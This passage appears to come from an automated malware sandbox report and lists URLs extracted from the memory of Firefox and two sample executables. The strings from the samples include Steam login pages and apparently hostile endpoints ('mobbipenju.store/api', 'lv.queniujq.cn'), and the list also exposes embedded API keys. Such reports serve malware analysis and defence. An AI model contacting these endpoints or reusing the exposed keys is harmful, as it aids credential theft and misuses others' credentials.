Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58FE4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2856886597.000002EE59200000.00000002.00000001.00040000.0000001D.sdmp String found in binary or memory: https://firefox.settings.services.allizom.org/v1/buckets/main-preview/collections/search-config/reco
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58FE4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.allizom.org/v1/buckets/main/collections/search-config/records
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58FE4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.allizom.org/v1/buckets/main/collections/search-config/recordsor
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58FE4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2856886597.000002EE59200000.00000002.00000001.00040000.0000001D.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main-preview/collections/search-config/reco
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58FE4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/search-config/records
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://fpn.firefox.com/browser?utm_source=firefox-desktop&utm_medium=referral&utm_campaign=about-pr
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://ftp.mozilla.org/pub/labs/devtools/adb-extension/#OS#/adb-extension-latest-#OS#.xpi
Source: firefox.exe, 0000001A.00000002.2869831146.000002EE5C44A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2872614032.000002EE5C848000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2855339754.000002EE58F79000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2939387090.000002EE67103000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2927621655.000002EE64B60000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2899937312.000002EE5E91B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/
Source: firefox.exe, 0000001A.00000002.2872614032.000002EE5C848000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2855339754.000002EE58FDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2752233467.000002EE65177000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2783622584.000002EE65177000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2927621655.000002EE64B60000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=$apiKey&locale_lang=
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58F79000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2855339754.000002EE58FDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2927621655.000002EE64B60000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/trending-topics?version=2&consumer_key=$apiKey&locale_l
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58F24000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2872614032.000002EE5C848000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2792367692.000002EE5D97D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2855339754.000002EE58F03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2927621655.000002EE64B60000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2899937312.000002EE5E91B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=bas
Source: firefox.exe, 0000001A.00000002.2869831146.000002EE5C44A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2872614032.000002EE5C848000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=40249-e88c401e1b1f2242d9e4
Source: firefox.exe, 0000001A.00000002.2869831146.000002EE5C44A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2855339754.000002EE58FAB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2872614032.000002EE5C848000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/career?utm_source=pocket-newtab
Source: firefox.exe, 0000001A.00000002.2935687612.000002EE65177000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2752233467.000002EE65177000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2783622584.000002EE65177000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/career?utm_source=pocket-newtabL
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58FE4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2872614032.000002EE5C848000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/entertainment?utm_source=pocket-newtab
Source: firefox.exe, 0000001A.00000002.2935687612.000002EE65177000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2752233467.000002EE65177000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2783622584.000002EE65177000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/entertainment?utm_source=pocket-newtabC
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58FAB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2872614032.000002EE5C848000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/food?utm_source=pocket-newtab
Source: firefox.exe, 0000001A.00000002.2935687612.000002EE65177000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2752233467.000002EE65177000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2783622584.000002EE65177000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/food?utm_source=pocket-newtabA
Source: firefox.exe, 0000001A.00000002.2869831146.000002EE5C44A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2855339754.000002EE58FAB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2872614032.000002EE5C848000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/health?utm_source=pocket-newtab
Source: firefox.exe, 0000001A.00000002.2935687612.000002EE65177000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2752233467.000002EE65177000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2783622584.000002EE65177000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/health?utm_source=pocket-newtabE
Source: firefox.exe, 0000001A.00000002.2869831146.000002EE5C44A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2855339754.000002EE58FAB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2872614032.000002EE5C848000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/science?utm_source=pocket-newtab
Source: firefox.exe, 0000001A.00000002.2935687612.000002EE65177000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2752233467.000002EE65177000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2783622584.000002EE65177000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/science?utm_source=pocket-newtabG
Source: firefox.exe, 0000001A.00000002.2869831146.000002EE5C44A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2855339754.000002EE58FE4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2872614032.000002EE5C848000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/self-improvement?utm_source=pocket-newtab
Source: firefox.exe, 0000001A.00000002.2935687612.000002EE65177000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2752233467.000002EE65177000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2783622584.000002EE65177000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/self-improvement?utm_source=pocket-newtab?
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58FE4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2872614032.000002EE5C848000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/technology?utm_source=pocket-newtab
Source: firefox.exe, 0000001A.00000002.2935687612.000002EE65177000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2752233467.000002EE65177000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2783622584.000002EE65177000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/technology?utm_source=pocket-newtabN
Source: firefox.exe, 0000001A.00000002.2872614032.000002EE5C848000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2855339754.000002EE58FDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2899937312.000002EE5E91B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tab
Source: firefox.exe, 0000001A.00000002.2869831146.000002EE5C44A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2855339754.000002EE58FAB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2872614032.000002EE5C848000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore?utm_source=pocket-newtab
Source: firefox.exe, 0000001A.00000002.2935687612.000002EE65177000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2752233467.000002EE65177000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2783622584.000002EE65177000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore?utm_source=pocket-newtabI
Source: firefox.exe, 0000001A.00000002.2872614032.000002EE5C848000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_more
Source: firefox.exe, 0000001A.00000002.2935687612.000002EE65177000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2752233467.000002EE65177000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2783622584.000002EE65177000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_more/
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58FE4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_morehome-prefs-recommended-by-learn-more
Source: firefox.exe, 0000001A.00000002.2872614032.000002EE5C848000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2855339754.000002EE58FDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2856566445.000002EE59000000.00000002.00000001.00040000.0000001C.sdmp, firefox.exe, 0000001A.00000002.2899937312.000002EE5E91B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/recommendations
Source: firefox.exe, 0000001A.00000002.2899937312.000002EE5E96C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2878148995.000002EE5D1ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/cfworker
Source: firefox.exe, 0000001A.00000003.2728228279.000002EE64E12000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2729720776.000002EE64E1E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2726795602.000002EE64E23000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/google/closure-compiler/issues/3177
Source: firefox.exe, 0000001A.00000003.2808538158.000002EE606E6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/lit/lit/blob/main/packages/reactive-element/src/decorators/query-all.ts
Source: firefox.exe, 0000001A.00000003.2808538158.000002EE606E6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/lit/lit/blob/main/packages/reactive-element/src/decorators/query.ts
Source: firefox.exe, 0000001A.00000003.2728228279.000002EE64E12000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2729720776.000002EE64E1E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2726795602.000002EE64E23000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/lit/lit/issues/1266
Source: firefox.exe, 0000001A.00000003.2728228279.000002EE64E12000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2729720776.000002EE64E1E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2726795602.000002EE64E23000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/microsoft/TypeScript/issues/338).
Source: firefox.exe, 0000001A.00000003.2681144026.000002EE5CB10000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2855339754.000002EE58F79000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2680534458.000002EE5C900000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2876295890.000002EE5CE00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000003.2683845506.000002EE5CB32000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2899937312.000002EE5E91B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mozilla-services/screenshots
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58F24000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2856566445.000002EE59000000.00000002.00000001.00040000.0000001C.sdmp, firefox.exe, 0000001A.00000002.2927621655.000002EE64B60000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/zertosh/loose-envify)
Source: firefox.exe, 0000001A.00000002.2869831146.000002EE5C44A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2872614032.000002EE5C848000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2941379352.00000C05D3904000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google.com
Source: firefox.exe, 0000001A.00000002.2929744715.000002EE64D53000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google.com/
Source: aae25c676b.exe, 00000015.00000002.2731829717.00000000017EB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://help.steampowered.com/
Source: file.exe, 00000000.00000003.2177063879.0000000001000000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000009.00000003.2562025854.0000000000C89000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000015.00000003.2711982095.000000000181E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://help.steampowered.com/en/
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://helper1.dap.cloudflareresearch.com/v02
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://ideas.mozilla.org/
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58FE4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://img-getpocket.cdn.mozilla.net/
Source: firefox.exe, 0000001A.00000002.2935687612.000002EE65177000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2752233467.000002EE65177000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2783622584.000002EE65177000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://img-getpocket.cdn.mozilla.net/X
Source: firefox.exe, 0000001A.00000002.2872614032.000002EE5C848000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2850784469.000002EE581AD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org
Source: firefox.exe, 0000001A.00000002.2869831146.000002EE5C44A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2872614032.000002EE5C848000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2927621655.000002EE64B60000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2899937312.000002EE5E91B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org/submit
Source: firefox.exe, 0000001A.00000003.2728228279.000002EE64E12000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2729720776.000002EE64E1E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2726795602.000002EE64E23000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://infra.spec.whatwg.org/#ascii-whitespace
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://install.mozilla.org
Source: firefox.exe, 0000001A.00000003.2787747889.000002EE5EF64000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2899937312.000002EE5E96C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2899937312.000002EE5E91B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://json-schema.org/draft/2019-09/schema
Source: firefox.exe, 0000001A.00000002.2899937312.000002EE5E96C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://json-schema.org/draft/2020-12/schema
Source: firefox.exe, 0000001A.00000003.2728228279.000002EE64E12000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2729720776.000002EE64E1E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2726795602.000002EE64E23000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lit.dev/docs/libraries/standalone-templates/#rendering-lit-html-templates
Source: firefox.exe, 0000001A.00000003.2728228279.000002EE64E12000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2729720776.000002EE64E1E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2726795602.000002EE64E23000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lit.dev/docs/templates/directives/#stylemap
Source: firefox.exe, 0000001A.00000003.2728228279.000002EE64E12000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2729720776.000002EE64E1E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2726795602.000002EE64E23000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lit.dev/docs/templates/expressions/#child-expressions)
Source: firefox.exe, 0000001A.00000003.2769083084.000002EE5D8EB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2883094027.000002EE5D8D6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2869831146.000002EE5C4B6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2855339754.000002EE58FE4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com/v1/country?key=%MOZILLA_API_KEY%
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58FE4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com/v1/country?key=%MOZILLA_API_KEY%This
Source: firefox.exe, 0000001A.00000002.2883094027.000002EE5D8BB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2880475164.000002EE5D370000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2769083084.000002EE5D8D6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2883094027.000002EE5D803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2883094027.000002EE5D8D6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2900792770.000002EE5EA6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com/v1/country?key=7e40f68c-7938-4c5d-9f95-e61647c213eb
Source: aae25c676b.exe, 00000015.00000002.2731829717.00000000017EB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.steampowered.com/
Source: aae25c676b.exe, 00000015.00000002.2730364070.00000000017D7000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000015.00000002.2731829717.00000000017EB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://lv.queniujq.cn
Source: firefox.exe, 0000001A.00000002.2860117948.000002EE59DAA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2869831146.000002EE5C487000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2855339754.000002EE58F79000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2862408899.000002EE59F22000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%s
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58F79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%sPdfJs.init
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58F79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%shttps://email.seznam.cz/newMessageScreen?mailto=%s
Source: firefox.exe, 0000001A.00000002.2869831146.000002EE5C487000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2855339754.000002EE58F79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.inbox.lv/compose?to=%s
Source: firefox.exe, 0000001A.00000002.2869831146.000002EE5C487000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.inbox.lv/compose?to=%sv
Source: firefox.exe, 0000001A.00000002.2869831146.000002EE5C487000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2855339754.000002EE58F79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%s
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58F79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%shttp://poczta.interia.pl/mh/?mailto=%sget
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58F79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%spdfjs.previousHandler.preferredAction
Source: firefox.exe, 0000001A.00000002.2869831146.000002EE5C487000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%st
Source: aae25c676b.exe, 00000015.00000002.2730364070.00000000017D7000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000015.00000002.2731829717.00000000017EB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://medal.tv
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58FAB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2848249080.000002EE4C9D7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2899937312.000002EE5E91B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://merino.services.mozilla.com/api/v1/suggest
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://mitmdetection.services.mozilla.com/
Source: aae25c676b.exe, 00000015.00000002.2730364070.00000000017A5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://mobbipenju.store:443/api
Source: firefox.exe, 0000001A.00000002.2880475164.000002EE5D3C8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mochitest.youtube.com/
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/?entrypoint=protection_report_monitor&utm_source=about-protections
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/about
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/breach-details/
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/oauth/init?entrypoint=protection_report_monitor&utm_source=about-protect
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/user/breach-stats?includeResolved=true
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/user/dashboard
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/user/preferences
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://mozilla-ohttp-fakespot.fastly-edge.com/
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://mozilla.cloudflare-dns.com/dns-query
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://normandy.cdn.mozilla.net/api/v1
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://oauth.accounts.firefox.com/v1
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58FE4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2903619697.000002EE5ED03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ok.ru/
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58F79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://outlook.live.com/default.aspx?rru=compose&to=%s
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://play.google.com/store/apps/details?id=org.mozilla.firefox&referrer=utm_source%3Dprotection_r
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://play.google.com/store/apps/details?id=org.mozilla.firefox.vpn&referrer=utm_source%3Dfirefox-
Source: firefox.exe, 0000001A.00000002.2880475164.000002EE5D3C8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://play.hbomax.com/page/
Source: firefox.exe, 0000001A.00000002.2880475164.000002EE5D3C8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://play.hbomax.com/player/
Source: aae25c676b.exe, 00000015.00000002.2730364070.00000000017D7000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000015.00000002.2731829717.00000000017EB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://player.vimeo.com
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58F79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://poczta.interia.pl/mh/?mailto=%s
Source: firefox.exe, 0000001A.00000002.2869831146.000002EE5C487000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://poczta.interia.pl/mh/?mailto=%sx
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://prod.ohttp-gateway.prod.webservices.mozgcp.net/ohttp-configs
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://profile.accounts.firefox.com/v1
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2855339754.000002EE58F79000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2856886597.000002EE59200000.00000002.00000001.00040000.0000001D.sdmp String found in binary or memory: https://profiler.firefox.com
